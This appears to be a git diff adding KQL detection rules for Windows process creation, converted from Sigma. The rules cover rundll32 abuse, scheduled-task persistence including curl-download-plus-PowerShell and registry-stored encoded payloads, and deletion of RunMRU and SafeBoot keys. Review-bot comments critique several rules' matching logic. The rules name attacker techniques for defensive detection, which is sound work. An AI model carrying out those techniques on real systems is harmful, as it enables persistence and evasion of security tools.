diff --git a/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql new file mode 100644 index 00000000..2afb89e2 --- /dev/null +++ b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql @@ -0,0 +1,10 @@ +// Title: Run Once Task Execution as Configured in Registry +// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated) +// Date: 2020-10-18 +// Level: low +// Description: This rule detects the execution of Run Once task as configured in the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql new file mode 100644 index 00000000..899fd381 --- /dev/null +++ b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql @@ -0,0 +1,10 @@ +// Title: Run PowerShell Script from ADS +// Author: Sergey Soldatov, Kaspersky Lab, oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects PowerShell script execution from Alternate Data Stream (ADS) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql new file mode 100644 index 00000000..985461e4 --- /dev/null +++ b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql @@ -0,0 +1,10 @@ +// Title: Run PowerShell Script from Redirected Input Stream +// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community +// Date: 2020-10-17 +// Level: high +// Description: Detects PowerShell script execution via input stream redirect +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql new file mode 100644 index 00000000..478a3349 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql 
@@ -0,0 +1,10 @@ +// Title: Rundll32 Execution With Uncommon DLL Extension +// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou +// Date: 2022-01-13 +// Level: medium +// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql new file mode 100644 index 00000000..fd90afa2 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Execution Without CommandLine Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Possible but rare + +DeviceProcessEvents +| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql new file mode 100644 index 00000000..14e734c2 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql 
@@ -0,0 +1,12 @@ +// Title: Rundll32 Execution Without Parameters +// Author: Bartlomiej Czyz, Relativity +// Date: 2021-01-31 +// Level: high +// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 +// False Positives: +// - False positives may occur if a user called rundll32 from CLI with no options + +DeviceProcessEvents +| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql new file mode 100644 index 00000000..d34e1e69 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 InstallScreenSaver Execution +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec +// Date: 2022-04-28 +// Level: medium +// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.011, attack.defense-evasion +// False Positives: +// - Legitimate installation of a new screensaver + +DeviceProcessEvents +| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql new file mode 100644 index 00000000..01fdf026 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql 
@@ -0,0 +1,12 @@ +// Title: Rundll32 Registered COM Objects +// Author: frack113 +// Date: 2022-02-13 +// Level: high +// Description: load malicious registered COM objects +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql new file mode 100644 index 00000000..318cee1b --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql @@ -0,0 +1,10 @@ +// Title: Rundll32 Spawned Via Explorer.EXE +// Author: CD_ROM_ +// Date: 2022-05-21 +// Level: medium +// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql new file mode 100644 index 00000000..37f35119 --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql 
@@ -0,0 +1,10 @@ +// Title: RunDLL32 Spawning Explorer +// Author: elhoim, CD_ROM_ +// Date: 2022-04-27 +// Level: high +// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql new file mode 100644 index 00000000..07ea6d5e --- /dev/null +++ b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 UNC Path Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects rundll32 execution where the DLL is located on a remote location (share) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql new file mode 100644 index 00000000..a2c6dfe5 --- /dev/null +++ b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql 
@@ -0,0 +1,12 @@
+// Title: RunMRU Registry Key Deletion
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..73990aa8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: SafeBoot Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
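Review bot: The image check in the SafeBoot where clause, `FolderPath endswith "reg.exe"`, is missing the path separator that the sibling rules in this batch use (`"\\reg.exe"` in the RunMRU hunk just above and in the MiniNt rule further down), so any binary whose file name merely ends in `reg.exe` satisfies the selection. Because the alternative `ProcessVersionInfoOriginalFileName =~ "reg.exe"` is still present this only widens the match rather than weakening it, but it is worth confirming whether the converter dropped the separator or the Sigma source omits it before the inconsistency propagates. Suggested line: `(FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")`.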
diff --git a/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
new file mode 100644
index 00000000..60c74f99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
@@ -0,0 +1,13 @@
+// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Benign scheduled tasks creations or executions that happen often during software installations
+// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR."
and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
new file mode 100644
index 00000000..a66f86ff
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
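Review bot: The exclusion `(InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml")` in the `not(...)` branch of the where clause is keyed on bare file-name substrings with no path, parent-process or `/Create` form constraint, unlike the Avira and Kaspersky exclusions beside it, which additionally require `\\Temp\\` and a specific `/Create /TN` string; any task creation whose command line merely contains `update_task.xml` therefore escapes the rule. Since this file is converter output the tightening belongs in the Sigma source, but it is worth flagging because this is otherwise the broadest path-based schtasks detection in the batch. Note that the where clause of this hunk is printed across two lines in this listing; it is a single KQL statement in the file.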
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Creation Masquerading as System Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005
+// False Positives:
+// - Legitimate system administration tasks scheduling trusted system processes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
new file mode 100644
index 00000000..c12084fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task Creation Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
new file mode 100644
index 00000000..3a32711c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
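Review bot: The exclusion `not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))` in the where clause is unlikely to filter anything in `DeviceProcessEvents`, where the account is split across `AccountDomain` (the `nt authority` part) and `AccountName` (`system`); the `AUTHORI` substring lives in the domain column, so tasks created by the built-in service accounts are not excluded and this low-level rule will fire on them. If the converter maps Sigma's `User` field straight onto `AccountName`, the filter should test `AccountDomain` instead, e.g. `(not((AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")))`, or compare against `strcat(AccountDomain, "\\", AccountName)` to keep the original `NT AUTHORITY\...` semantics. Worth verifying against a sample of events before merging, as the mapping is inferred from the column names rather than visible in this hunk.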
@@ -0,0 +1,14 @@
+// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of schtasks for administrative purposes.
+// - Automation scripts combining curl and PowerShell in controlled environments.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
new file mode 100644
index 00000000..f2416006
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Executing Encoded Payload from Registry
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
new file mode 100644
index 00000000..286baa0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
@@ -0,0 +1,10 @@
+// Title: Scheduled Task Executing Payload from Registry
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
new file mode 100644
index 00000000..59754001
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
@@ -0,0 +1,10 @@
+// Title: Schtasks Creation Or Modification With SYSTEM Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
new file mode 100644
index 00000000..8442867e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
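Review bot: The account selector `ProcessCommandLine contains " SYSTEM "` in the where clause requires a trailing space, so a command line whose last token is `/ru SYSTEM` is not matched by that branch; `NT AUT` still covers the domain-qualified spelling, but the bare form is the one most often typed last. The condition is inherited from the Sigma source, so the fix belongs upstream rather than in this generated file; a tolerant form would be `(ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM " or ProcessCommandLine endswith " SYSTEM")`. The Avira exclusion on the same line is also the only one in this batch that excludes on a bare `/RL HIGHEST` fragment without an accompanying path, which is worth a second look when the upstream rule is revisited.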
@@ -0,0 +1,10 @@
+// Title: Schtasks From Suspicious Folders
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-15
+// Level: high
+// Description: Detects scheduled task creations that have suspicious action command and folder combinations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
new file mode 100644
index 00000000..7c7ed0ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Screen Capture Activity Via Psr.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql
new file mode 100644
index 00000000..3e9938a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql
@@ -0,0 +1,10 @@
+// Title: Script Event Consumer Spawning Process
+// Author: Sittikorn S
+// Date: 2021-06-21
+// Level: high
+// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
